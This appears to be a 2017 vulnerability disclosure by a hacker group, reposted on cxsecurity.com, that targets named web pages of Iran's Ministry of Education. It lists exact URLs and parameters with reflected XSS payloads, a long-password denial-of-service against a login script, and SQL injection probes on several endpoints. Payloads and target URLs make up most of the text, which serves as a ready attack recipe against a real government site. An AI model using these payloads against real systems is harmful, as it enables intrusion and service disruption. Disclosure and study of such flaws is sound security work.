Iran's Sensing Center, Ministry of Education XSS / SQLi / DoS / CSRF

Published: 2017.06.20
Credit: Infinity Security Team
Risk: Low
CWE: N/A
CVE: N/A
Local: No
Remote: Yes

# Vulnerability Title: Iran's Sensing Center, Ministry of Education High level vulns
# Date: 2017-06-20
# Exploit Author: Infinity Security Team
# Google Dork: [-]
# Vendor Homepage: http://www.medu.ir
# Tested on: Windows 7 (applicable to all Windows platforms)
# I show you how deep the rabbit-hole goes. "Morpheus"
--------------------------
1. Cross-Site Scripting (XSS):
[+] http://aee.medu.ir/IranEduThms/theme2/cntntpge.php
- "rcid" (GET input) parameter must be set to:
- 67" onmouseover=prompt(916009) bad="
- or
- 67" onmouseover=prompt(948428) bad="
- The value is echoed into an HTML attribute without the double quote being encoded, so the payload closes the attribute and injects an onmouseover handler; the number inside prompt() is only a marker for spotting the reflection in the response.

2. Long Password Denial of Service:
=> The attacker may cause the website to become temporarily or indefinitely unavailable or unresponsive by submitting an extremely long password, because the login check processes the value with no length limit.

[+] http://aee.medu.ir/IranEdu/edu_usrlgnchck.php
- Vulnerable password input: "pass11"
- Tested with a value of more than 1,000,000 characters.

3. SQL Injection:
[+] http://aee.medu.ir/IranEdu/edu_getofferview.php > "cfnam" parameter set to "\"
    "cmail" parameter set to "\"
    "ctext" parameter set to "\"
[+] http://aee.medu.ir/IranEdu/edu_newstoprnt.php > "rcid" parameter set to "1'""
[+] http://aee.medu.ir/IranEdu/edu_sndtofrnd.php > "rcid" parameter set to "1'""
[+] http://aee.medu.ir/IranEduThms/theme2/cntntpge.php > "rcid" parameter set to "1'""
- All are GET inputs.
- A lone backslash or an unbalanced quote breaks the SQL string literal around the value; a database error in the response shows the input reaches the query unsanitized. These are error-based detection probes, not a demonstration of data extraction.
--------------------------
# Discovered By: Root_Killer(https://t.me/root_killer)
# https://t.me/InfinitySec
# Root_Killer, Ehsan Korn
# @InfinitySec, @root_killer, @pohzeyshen




Copyright 2017, cxsecurity.com